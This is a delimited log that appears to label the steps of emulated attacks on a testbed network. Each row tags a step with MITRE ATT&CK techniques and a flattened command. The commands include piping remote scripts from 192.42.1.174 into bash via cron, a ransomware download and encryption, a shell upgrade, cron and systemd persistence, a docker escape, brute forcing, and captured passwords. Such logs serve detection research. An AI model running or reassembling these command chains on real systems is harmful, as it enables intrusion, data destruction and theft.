3_vnc_healthcheck;lateral-movement;T1021.005;NA;43;terminal;1765549384.439424;1765549396.0
3_vnc_healthcheck;lateral-movement;T1021.005;NA;44;sudo__i;1765549420.453466;1765549439.0
3_vnc_healthcheck;credential-access;T1003.008;NA;45;key;1765549508.487801;1765549519.0
3_vnc_healthcheck;collection;T1213;NA;46;key;1765549543.503669;1765549554.0
3_vnc_healthcheck;collection;T1039;NA;47;key;1765549578.523648;1765549586.0
3_vnc_healthcheck;command-and-controlexecutionexecution_persistence_privilege-escalationlateral-movementcommand-and-control;T1105_T1059.004_T1053.003_T1021.005_T1071.001;NA;56;echo__curl_http___192_42_1_174_8888_install_sh___bash______media_share_healthcheck_cron_sh;1765549595.528145;1765549604.0
3_vnc_healthcheck;lateral-movement;T1021.005;NA;57;close;1765549628.543519;1765549634.0
3_vnc_healthcheck;discovery;T1082;NA;35;sysinfo;1765549643.733173;1765549813.0
3_vnc_healthcheck;discovery;T1033;NA;36;getuid;1765549822.226739;1765549829.0
3_vnc_healthcheck;execution;T1059;NA;19;shell;1765549869.808575;1765549877.0
3_vnc_healthcheck;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765549886.025269;1765549893.0
3_vnc_healthcheck;execution;T1059;NA;21;export_SHELL_bash;1765549902.395576;1765549909.0
3_vnc_healthcheck;execution;T1059;NA;22;export_TERM_xterm256_color;1765549918.762878;1765549926.0
3_vnc_healthcheck;execution;T1059;NA;23;stty_rows_38_columns_116;1765549935.130208;1765549942.0
3_vnc_healthcheck;execution;T1059;NA;24;export_PS1__PWN__;1765549951.411086;1765549958.0
3_vnc_healthcheck;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765549967.735217;1765549975.0
3_vnc_healthcheck;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765549984.061835;1765549994.0
3_vnc_healthcheck;discovery;T1018;NA;27;find__media_data_Images;1765550000.430899;1765550007.0
3_vnc_healthcheck;discovery;T1087.001;NA;28;cat__etc_passwd;1765550016.81146;1765550024.0
3_vnc_healthcheck;impact;T1531;NA;29;userdel__f_john;1765550033.091623;1765550040.0
3_vnc_healthcheck;impact;T1485;NA;30;rm;1765550049.453031;1765550056.0
3_vnc_healthcheck;impact;T1490;NA;31;rm;1765550065.829331;1765550073.0
3_vnc_healthcheck;impact;T1489;NA;32;systemctl_stop_exim4_service;1765550082.16646;1765550119.0
3_vnc_puppet;credential-accesslateral-movement;T1110.001_T1021.005;NA;58;items_LISTA_;1765740780.027561;1765741326.0
3_vnc_puppet;lateral-movement;T1021.005;NA;42;click;1765741335.320118;1765741344.0
3_vnc_puppet;lateral-movement;T1021.005;NA;43;terminal;1765741353.324804;1765741365.0
3_vnc_puppet;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;59;sudo__i;1765741389.338609;1765741398.0
3_vnc_puppet;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;59;sudo__i;1765741422.354904;1765741441.0
3_vnc_puppet;credential-access;T1003.008;NA;45;key;1765741510.397461;1765741521.0
3_vnc_puppet;collection;T1213;NA;46;key;1765741545.422639;1765741556.0
3_vnc_puppet;collection;T1039;NA;47;key;1765741580.447995;1765741594.0
3_vnc_puppet;execution_lateral-movementcommand-and-controlexecution;T1072_T1105_T1059.004;NA;60;key;1765741648.524237;1765741729.0
3_vnc_puppet;execution;T1059;NA;19;shell;1765741746.255616;1765741753.0
3_vnc_puppet;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765741762.521674;1765741769.0
3_vnc_puppet;execution;T1059;NA;21;export_SHELL_bash;1765741778.888133;1765741786.0
3_vnc_puppet;execution;T1059;NA;22;export_TERM_xterm256_color;1765741795.243498;1765741802.0
3_vnc_puppet;execution;T1059;NA;23;stty_rows_38_columns_116;1765741811.528912;1765741818.0
3_vnc_puppet;execution;T1059;NA;24;export_PS1__PWN__;1765741827.850745;1765741835.0
3_vnc_puppet;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765741844.226411;1765741851.0
3_vnc_puppet;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765741860.596682;1765741870.0
3_vnc_puppet;discovery;T1018;NA;27;find__media_data_Images;1765741876.912521;1765741884.0
3_vnc_puppet;discovery;T1087.001;NA;28;cat__etc_passwd;1765741893.308017;1765741900.0
3_vnc_puppet;impact;T1531;NA;29;userdel__f_john;1765741909.597456;1765741916.0
3_vnc_puppet;impact;T1485;NA;30;rm;1765741925.894437;1765741933.0
3_vnc_puppet;impact;T1490;NA;31;rm;1765741942.18166;1765741949.0
3_vnc_puppet;impact;T1489;NA;32;systemctl_stop_exim4_service;1765741958.510388;1765741995.0
4;command-and-control;T1071.001;NA;1;generate_implant;1765796569.184731;1765796588.0
4;command-and-control;T1071.001;NA;2;start_https_listener;1765796597.973346;1765796604.0
4;defense-evasion_persistence_privilege-escalation_initial-accesscommand-and-controldefense-evasion_persistence_command-and-control;T1078.003_T1105_T1205.001;NA;3;sshpass__p__rambo__scp__o_StrictHostKeyChecking_no__o_ProxyCommand__sshpass__p__rambo__ssh__o_StrictHostKeyChecking_no__p_10022_john_fw_attackbed_com_nc_firewall_attackbed_local_22___home_aecid_auditf_tar_gz_john_firewall_attackbed_local__tmp_auditf_tar_gz;1765796613.743321;1765796634.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;4;id;1765796643.173316;1765796660.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;5;ssh__o_StrictHostKeyChecking_no__o_PreferredAuthentications_password_john_firewall_attackbed_local_;1765796669.397715;1765796685.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;6;rambo_;1765796694.503413;1765796702.0
4;privilege-escalation_defense-evasion;T1548.003;NA;7;_i_;1765796711.363792;1765796734.0
4;privilege-escalation_defense-evasion;T1548.003;NA;8;rambo_;1765796743.370515;1765796750.0
4;defense-evasiondefense-evasion_persistence_command-and-control;T1036.005_T1205.001;NA;9;tar__xzf__tmp_auditf_tar_gz__C__usr_bin_;1765796759.102844;1765796765.0
4;defense-evasion;T1070.004;NA;10;rm;1765796774.201647;1765796783.0
4;persistence_privilege-escalation;T1543.002;NA;11;_Unit__Description_Run_auditf_on_boot___Service__ExecStart_auditf_WorkingDirectory__usr_bin_Restart_on_failure_Type_simple___Install__WantedBy_multi_user_target_;1765796927.353032;1765796948.0
4;persistence_privilege-escalation;T1543.002;NA;12;_wq__;1765796987.364409;1765796995.0
4;persistence_privilege-escalation;T1543.002;NA;13;systemctl_daemon_reload_;1765797004.402143;1765797015.0
4;persistence_privilege-escalation;T1543.002;NA;14;systemctl_enable_auditf_service_;1765797024.860971;1765797034.0
4;persistence_privilege-escalation;T1543.002;NA;15;systemctl_start_auditf_service_;1765797043.267958;1765797059.0
4;defense-evasion_persistence_command-and-controlcommand-and-controldefense-evasion;T1205.001_T1071.001_T1036.005;NA;16;_home_aecid_knock_cli__c_knock_yaml__r_knock_firewall;1765797103.398182;1765797114.0
4;defense-evasion;T1599;NA;17;execute;1765797123.443731;1765797129.0
4;defense-evasion;T1599;NA;18;execute;1765797138.534163;1765797145.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;19;id;1765797154.587276;1765797162.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;20;ssh__o_StrictHostKeyChecking_no__o_PreferredAuthentications_password_john_linuxshare_attackbed_local_;1765797171.153277;1765797182.0
4;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;21;rambo_;1765797191.241217;1765797199.0
4;discovery;T1082;NA;22;hostname_;1765797208.297004;1765797244.0
5;credential-access_discoverycredential-access_collection;T1040_T1557.002;NA;1;bettercap__caplet__home_aecid_bettercap_cap;1760008116.165282;1760008122.0
5;credential-access_discoverycredential-access;T1040_T1528;NA;2;_usr_local_share_attackmate_venvpython3__home_aecid_get_auth_py;1760008136.165282;1760008210.0
5;defense-evasion_lateral-movement;T1550.001;NA;3;GET;1760008234.553295;1760008240.0
6_macro_binary;command-and-controlexecution;T1105_T1204.002;NA;1;key;1765277478.87141;1765277490.0
6_macro_binary;execution;T1204.002;NA;2;key;1765277514.897282;1765277533.0
6_macro_binary;discovery;T1082;NA;3;sysinfo;1765277533.089892;1765277545.0
6_macro_binary;command-and-control;T1105;NA;4;upload_downloader_sh;1765277554.661725;1765277562.0
6_macro_binary;execution;T1059.004;NA;5;shell;1765277586.054663;1765277593.0
6_macro_binary;execution;T1059.004;NA;6;python3__c__import_pty_pty_spawn___bash_____;1765277602.41324;1765277609.0
6_macro_binary;execution;T1059.004;NA;7;export_SHELL_bash;1765277618.773499;1765277626.0
6_macro_binary;execution;T1059.004;NA;8;export_TERM_xterm256_color;1765277635.149335;1765277642.0
6_macro_binary;execution;T1059.004;NA;9;stty_rows_38_columns_116;1765277651.515965;1765277658.0
6_macro_binary;execution;T1059.004;NA;10;export_DISPLAY__0;1765277667.883572;1765277675.0
6_macro_binary;command-and-control;T1105;NA;11;curl__o__home_judy__local_share_firefox_firefox_startup_dailynews_wire_com_8083_index;1765277684.220261;1765277691.0
6_macro_binary;persistence_privilege-escalation_defense-evasionprivilege-escalation_persistence;T1574.008_T1546;NA;12;ln__sf__home_judy__local_share_firefox_firefox_startup__home_judy__localfirefox;1765277700.586054;1765277707.0
6_macro_binary;defense-evasion;T1222.002;NA;13;chmod__x__home_judy__local_share_firefox_firefox_startup;1765277716.916823;1765277724.0
6_macro_binary;command-and-control;T1105;NA;14;curl__o__home_judy__localtask_runner_dailynews_wire_com_8082_index;1765277733.273726;1765277740.0
6_macro_binary;collection;T1115;NA;15;xclip__selection_clipboard__o;1765277749.514484;1765277756.0
6_macro_binary;defense-evasion;T1564.001;NA;16;cp__tmp_index__home_judy__index;1765277765.881365;1765277773.0
6_macro_binary;defense-evasion;T1222.002;NA;17;chmod__x__home_judy__localtask_runner;1765277782.122814;1765277789.0
6_macro_binary;defense-evasion;T1222.002;NA;18;chmod__x__home_judy_downloader_sh;1765277798.485548;1765277805.0
6_macro_binary;discovery;T1010;NA;19;wmctrl__l;1765277814.850158;1765277822.0
6_macro_binary;execution_persistence_privilege-escalation;T1053.003;NA;20;crontab__e;1765277831.168499;1765277838.0
6_macro_binary;execution_persistence_privilege-escalation;T1053.003;NA;21;__10__________home_judy_downloader_sh;1765277880.182365;1765277927.0
6_macro_binary;execution_persistence_privilege-escalation;T1053.003;NA;22;_wq__;1765277952.824707;1765278010.0
6_macro_binary;defense-evasion;T1070.003;NA;23;history__c;1765277929.179431;1765277951.0
6_macro_cron;command-and-controlexecution;T1105_T1204.002;NA;1;key;1765360740.134735;1765360753.0
6_macro_cron;execution;T1204.002;NA;2;key;1765360777.1596;1765360823.0
6_macro_cron;discovery;T1082;NA;3;sysinfo;1765360822.357011;1765360834.0
6_macro_cron;command-and-control;T1105;NA;4;upload_downloader_sh;1765360843.893111;1765360851.0
6_macro_cron;execution;T1059.004;NA;5;shell;1765360875.272236;1765360882.0
6_macro_cron;execution;T1059.004;NA;6;python3__c__import_pty_pty_spawn___bash_____;1765360891.63207;1765360898.0
6_macro_cron;execution;T1059.004;NA;7;export_SHELL_bash;1765360907.994595;1765360915.0
6_macro_cron;execution;T1059.004;NA;8;export_TERM_xterm256_color;1765360924.353349;1765360931.0
6_macro_cron;execution;T1059.004;NA;9;stty_rows_38_columns_116;1765360940.710076;1765360948.0
6_macro_cron;execution;T1059.004;NA;10;export_DISPLAY__0;1765360957.028943;1765360964.0
6_macro_cron;command-and-control;T1105;NA;14;curl__o__home_judy__localtask_runner_dailynews_wire_com_8082_index;1765360973.38978;1765360980.0
6_macro_cron;collection;T1115;NA;15;xclip__selection_clipboard__o;1765360989.720096;1765360997.0
6_macro_cron;defense-evasion;T1564.001;NA;16;cp__tmp_index__home_judy__index;1765361006.083338;1765361013.0
6_macro_cron;defense-evasion;T1222.002;NA;17;chmod__x__home_judy__localtask_runner;1765361022.373697;1765361029.0
6_macro_cron;defense-evasion;T1222.002;NA;18;chmod__x__home_judy_downloader_sh;1765361038.645813;1765361045.0
6_macro_cron;discovery;T1010;NA;19;wmctrl__l;1765361054.893245;1765361062.0
6_macro_cron;execution_persistence_privilege-escalation;T1053.003;NA;20;crontab__e;1765361071.216133;1765361078.0
6_macro_cron;execution_persistence_privilege-escalation;T1053.003;NA;21;__10__________home_judy_downloader_sh;1765361120.321794;1765361167.0
6_macro_cron;execution_persistence_privilege-escalation;T1053.003;NA;24;__5_________bash__c__home_judy__index;1765361169.318112;1765361211.0
6_macro_cron;execution_persistence_privilege-escalation;T1053.003;NA;22;_wq__;1765361242.048328;1765361839.0
6_macro_cron;defense-evasion;T1070.003;NA;23;history__c;1765361218.365582;1765361240.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;25;wget__O___home_judy_extension_xpi_dailynews_wire_com_8082_index;1765444814.665152;1765444823.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;26;key;1765444832.6839;1765444867.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;27;xdg_settings_set_default_web_browser_firefox_desktop____firefox_extension_xpi;1765444867.692111;1765444876.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;26;key;1765444885.712438;1765444960.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;28;move;1765444960.723121;1765444973.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;29;click;1765444977.730055;1765444985.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;30;move;1765444994.735945;1765445010.0
6_plugin;persistencecollection_credential-accesscollection_credential-accesscollection;T1176_T1056.001_T1056.004_T1115;NA;29;click;1765445011.741212;1765445024.0
6_plugin;collection_credential-access;T1056.001;NA;31;172_17_10;1765445063.757327;1765445075.0
6_plugin;collection_credential-access;T1056.001;NA;32;0_121_80_zm;1765445079.764204;1765445131.0
6_plugin;collection_credential-accesscollection_credential-access;T1056.004_T1056.001;NA;33;StarryEcho42BlazeTrix;1765445131.777439;1765445159.0
6_plugin;collection_credential-accesscollection_credential-access;T1056.004_T1056.001;NA;34;TwilightV3n0mR3alm9QzX;1765445163.790492;1765445192.0
6_plugin;collection_credential-access;T1056.004;NA;35;key;1765445196.80223;1765445247.0
6_plugin;collection;T1115;NA;36;move;1765445251.815577;1765445261.0
6_plugin;collection;T1115;NA;37;click;1765445268.821025;1765445304.0
6_screensharing_binary;executioncommand-and-controlinitial-access;T1204.001_T1105_T1566.004;NA;38;sudo_wget__O_rustdesk_deb__e_use_proxy_yes__e_https_proxy_https___192_168_50_254_3128_https___github_com_rustdesk_rustdesk_releases_download_1_3_8_rustdesk_1_3_8_x86_64_deb;1765379228.140453;1765379236.0
6_screensharing_binary;executioncommand-and-controlinitial-access;T1204.001_T1105_T1566.004;NA;39;key;1765379245.174466;1765379431.0
6_screensharing_binary;executioncommand-and-control;T1204.001_T1219;NA;40;sudo_apt_install__fy___rustdesk_deb;1765379440.189145;1765379449.0
6_screensharing_binary;executioncommand-and-control;T1204.001_T1219;NA;41;key;1765379458.208684;1765379644.0
6_screensharing_binary;initial-accesscommand-and-control;T1566.004_T1219;NA;42;sudo_rustdesk___password_password;1765379653.220461;1765379661.0
6_screensharing_binary;initial-accesscommand-and-control;T1566.004_T1219;NA;43;key;1765379670.228394;1765379686.0
6_screensharing_binary;initial-accesscommand-and-control;T1566.004_T1219;NA;44;rustdesk;1765379695.236242;1765379703.0
6_screensharing_binary;initial-accesscommand-and-control;T1566.004_T1219;NA;43;key;1765379712.243273;1765379736.0
6_screensharing_binary;command-and-control;T1219;NA;45;192_42_1_174;1765379745.301333;1765379902.0
6_screensharing_binary;command-and-control;T1219;NA;46;click;1765379926.317761;1765380061.0
6_screensharing_binary;command-and-control;T1219;NA;47;move;1765380521.750168;1765380590.0
6_screensharing_binary;command-and-control;T1219;NA;46;click;1765380599.760228;1765380626.0
6_screensharing_binary;command-and-controlcommand-and-controldefense-evasion;T1105_T1219_T1564.001;NA;48;curl__o__home_judy__index_facebock_com_8080_index;1765380695.830098;1765380721.0
6_screensharing_binary;command-and-controlcommand-and-controldefense-evasion;T1105_T1219_T1564.001;NA;49;key;1765380730.840364;1765380746.0
6_screensharing_binary;defense-evasioncommand-and-control;T1222.002_T1219;NA;50;sudo_chmod__x__home_judy__index;1765380755.848726;1765380781.0
6_screensharing_binary;defense-evasioncommand-and-control;T1222.002_T1219;NA;51;key;1765380790.859935;1765380797.0
6_screensharing_binary;command-and-controlcommand-and-control;T1105_T1219;NA;52;curl__o__home_judy__local_share_firefox_firefox_startup_192_42_1_174_8083_index;1765380806.867252;1765380822.0
6_screensharing_binary;command-and-controlcommand-and-control;T1105_T1219;NA;53;key;1765380831.885372;1765380847.0
6_screensharing_binary;defense-evasioncommand-and-control;T1222.002_T1219;NA;54;chmod__x__home_judy__local_share_firefox_firefox_startup;1765380856.894112;1765380872.0
6_screensharing_binary;defense-evasioncommand-and-control;T1222.002_T1219;NA;51;key;1765380881.912713;1765380890.0
6_screensharing_binary;persistence_privilege-escalation_defense-evasioncommand-and-control;T1574.008_T1219;NA;55;ln__sf__home_judy__local_share_firefox_firefox_startup__home;1765380899.917902;1765380906.0
6_screensharing_binary;persistence_privilege-escalation_defense-evasioncommand-and-control;T1574.008_T1219;NA;56;_judy__local_bin_firefox;1765380915.936799;1765380922.0
6_screensharing_binary;persistence_privilege-escalation_defense-evasioncommand-and-control;T1574.008_T1219;NA;57;key;1765380931.947863;1765380940.0
6_screensharing_binary;executioncommand-and-control;T1059.004_T1219;NA;58;firefox;1765380949.955382;1765380956.0
6_screensharing_binary;executioncommand-and-control;T1059.004_T1219;NA;59;key;1765380965.965194;1765380974.0
6_screensharing_binary;discovery;T1082;NA;3;sysinfo;1765380984.118788;1765380996.0
6_screensharing_binary;command-and-control;T1105;NA;4;upload_downloader_sh;1765381005.619986;1765381012.0
6_screensharing_binary;execution;T1059.004;NA;5;shell;1765381036.974084;1765381044.0
6_screensharing_binary;execution;T1059.004;NA;6;python3__c__import_pty_pty_spawn___bash_____;1765381053.285864;1765381060.0
6_screensharing_binary;execution;T1059.004;NA;7;export_SHELL_bash;1765381069.560938;1765381076.0
6_screensharing_binary;execution;T1059.004;NA;8;export_TERM_xterm256_color;1765381085.78076;1765381093.0
6_screensharing_binary;execution;T1059.004;NA;9;stty_rows_38_columns_116;1765381102.152988;1765381109.0
6_screensharing_binary;execution;T1059.004;NA;10;export_DISPLAY__0;1765381118.520526;1765381125.0
6_screensharing_binary;command-and-control;T1105;NA;14;curl__o__home_judy__localtask_runner_dailynews_wire_com_8082_index;1765381134.838633;1765381142.0
6_screensharing_binary;collection;T1115;NA;15;xclip__selection_clipboard__o;1765381151.14884;1765381158.0
6_screensharing_binary;defense-evasion;T1222.002;NA;17;chmod__x__home_judy__localtask_runner;1765381167.498607;1765381174.0
6_screensharing_binary;defense-evasion;T1222.002;NA;18;chmod__x__home_judy_downloader_sh;1765381183.781693;1765381191.0
6_screensharing_binary;discovery;T1010;NA;19;wmctrl__l;1765381200.112451;1765381207.0
6_screensharing_binary;execution_persistence_privilege-escalation;T1053.003;NA;20;crontab__e;1765381216.438095;1765381223.0
6_screensharing_binary;execution_persistence_privilege-escalation;T1053.003;NA;21;__10__________home_judy_downloader_sh;1765381265.450781;1765381312.0
6_screensharing_binary;execution_persistence_privilege-escalation;T1053.003;NA;22;_wq__;1765381338.135561;1765381935.0
6_screensharing_binary;defense-evasion;T1070.003;NA;23;history__c;1765381314.512496;1765381336.0
6_screensharing_cron;executioncommand-and-controlinitial-access;T1204.001_T1105_T1566.004;NA;38;sudo_wget__O_rustdesk_deb__e_use_proxy_yes__e_https_proxy_https___192_168_50_254_3128_https___github_com_rustdesk_rustdesk_releases_download_1_3_8_rustdesk_1_3_8_x86_64_deb;1765385741.814665;1765385749.0
6_screensharing_cron;executioncommand-and-controlinitial-access;T1204.001_T1105_T1566.004;NA;39;key;1765385758.838868;1765386064.0
6_screensharing_cron;executioncommand-and-control;T1204.001_T1219;NA;40;sudo_apt_install__fy___rustdesk_deb;1765386073.84587;1765386082.0
6_screensharing_cron;executioncommand-and-control;T1204.001_T1219;NA;41;key;1765386091.861395;1765386397.0
6_screensharing_cron;initial-accesscommand-and-control;T1566.004_T1219;NA;42;sudo_rustdesk___password_password;1765386406.870909;1765386414.0
6_screensharing_cron;initial-accesscommand-and-control;T1566.004_T1219;NA;43;key;1765386423.889044;1765386439.0
6_screensharing_cron;initial-accesscommand-and-control;T1566.004_T1219;NA;44;rustdesk;1765386448.895256;1765386456.0
6_screensharing_cron;initial-accesscommand-and-control;T1566.004_T1219;NA;43;key;1765386465.902119;1765386489.0
6_screensharing_cron;command-and-control;T1219;NA;45;192_42_1_174;1765386498.978291;1765386655.0
6_screensharing_cron;command-and-control;T1219;NA;46;click;1765386679.990134;1765386814.0
6_screensharing_cron;command-and-control;T1219;NA;47;move;1765387275.221452;1765387344.0
6_screensharing_cron;command-and-control;T1219;NA;46;click;1765387353.230942;1765387380.0
6_screensharing_cron;command-and-controlcommand-and-controldefense-evasion;T1105_T1219_T1564.001;NA;48;curl__o__home_judy__index_facebock_com_8080_index;1765387449.261085;1765387475.0
6_screensharing_cron;command-and-controlcommand-and-controldefense-evasion;T1105_T1219_T1564.001;NA;49;key;1765387484.276726;1765387500.0
6_screensharing_cron;defense-evasioncommand-and-control;T1222.002_T1219;NA;50;sudo_chmod__x__home_judy__index;1765387509.284687;1765387535.0
6_screensharing_cron;defense-evasioncommand-and-control;T1222.002_T1219;NA;51;key;1765387544.301645;1765387551.0
6_screensharing_cron;command-and-controlexecution;T1219_T1059.004;NA;60;_home_judy__index__;1765387560.310526;1765387586.0
6_screensharing_cron;command-and-controlexecution;T1219_T1059.004;NA;59;key;1765387595.323764;1765387606.0
6_screensharing_cron;discovery;T1082;NA;3;sysinfo;1765387615.443862;1765387627.0
6_screensharing_cron;command-and-control;T1105;NA;4;upload_downloader_sh;1765387636.955659;1765387644.0
6_screensharing_cron;execution;T1059.004;NA;5;shell;1765387668.295655;1765387675.0
6_screensharing_cron;execution;T1059.004;NA;6;python3__c__import_pty_pty_spawn___bash_____;1765387684.512602;1765387691.0
6_screensharing_cron;execution;T1059.004;NA;7;export_SHELL_bash;1765387700.88676;1765387708.0
6_screensharing_cron;execution;T1059.004;NA;8;export_TERM_xterm256_color;1765387717.259517;1765387724.0
6_screensharing_cron;execution;T1059.004;NA;9;stty_rows_38_columns_116;1765387733.626763;1765387740.0
6_screensharing_cron;execution;T1059.004;NA;10;export_DISPLAY__0;1765387749.960071;1765387757.0
6_screensharing_cron;command-and-control;T1105;NA;14;curl__o__home_judy__localtask_runner_dailynews_wire_com_8082_index;1765387766.331259;1765387773.0
6_screensharing_cron;collection;T1115;NA;15;xclip__selection_clipboard__o;1765387782.698147;1765387790.0
6_screensharing_cron;defense-evasion;T1222.002;NA;17;chmod__x__home_judy__localtask_runner;1765387799.009554;1765387806.0
6_screensharing_cron;defense-evasion;T1222.002;NA;18;chmod__x__home_judy_downloader_sh;1765387815.374873;1765387822.0
6_screensharing_cron;discovery;T1010;NA;19;wmctrl__l;1765387831.740932;1765387838.0
6_screensharing_cron;execution_persistence_privilege-escalation;T1053.003;NA;20;crontab__e;1765387848.00036;1765387855.0
6_screensharing_cron;execution_persistence_privilege-escalation;T1053.003;NA;21;__10__________home_judy_downloader_sh;1765387896.997087;1765387944.0
6_screensharing_cron;execution_persistence_privilege-escalation;T1053.003;NA;24;__5_________bash__c__home_judy__index;1765387945.872527;1765387988.0
6_screensharing_cron;execution_persistence_privilege-escalation;T1053.003;NA;22;_wq__;1765388018.478988;1765388615.0
6_screensharing_cron;defense-evasion;T1070.003;NA;23;history__c;1765387994.851946;1765388017.0
7;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1768990206.72578;1768990216.0
7;reconnaissance;T1589.002;NA;2;__smtp_user_enum_pl___M_VRFY__U_smtp_user_txt__t_mail_attackbed_com;1768990225.391788;1768990261.0
7;defense-evasion_persistence_privilege-escalation_initial-accesscredential-accesspersistence_initial-access;T1078.002_T1110.001_T1133;NA;3;hydra__l__alice_attackbed_com___P_smtp_pass_txt__c_5__s_143_mail_attackbed_com_imap;1768990270.641499;1768991500.0
7;reconnaissance;T1592.002;NA;4;GET;1768991509.034047;1768991515.0
7;command-and-controlcommand-and-control;T1071.001_T1573.001;NA;5;start_https_listener;1768991553.638031;1768991559.0
7;initial-accessexecutioncommand-and-control;T1190_T1059.004_T1095;NA;6;exploit_unix_webapp_nextcloud_workflows_rce;1768991588.967257;1768991675.0
7;discovery;T1033;NA;7;getuid;1768991684.529027;1768991722.0
7;discovery;T1057;NA;8;docker__H_tcp___localhost_1090_ps;1768991747.515527;1768991783.0
7;discovery;T1016;NA;9;docker__H_tcp___localhost_1090_network_list;1768991792.664986;1768991828.0
7;defense-evasion_executionpersistenceexecution_persistence_privilege-escalationlateral-movement;T1610_T1525_T1053.003_T1210;NA;10;docker__H_tcp___localhost_1090_run___rm__t__u_root___network_nextcloud_default__v__etc_etc__kalilinux_kali_rolling_bash__c__echo_____5_________root_test__e_tool____curl_http___192_42_1_174_8888_tool___tool____chmod__x_tool____tool_____etc_cron_d_sysvz;1768991837.780463;1768992238.0
7;discovery;T1083;NA;11;ls;1768992248.007286;1768992284.0
7;discovery;T1057;NA;12;ps;1768992293.071921;1768992329.0
7;credential-accessexfiltration;T1003.008_T1041;NA;13;download;1768992353.165605;1768992389.0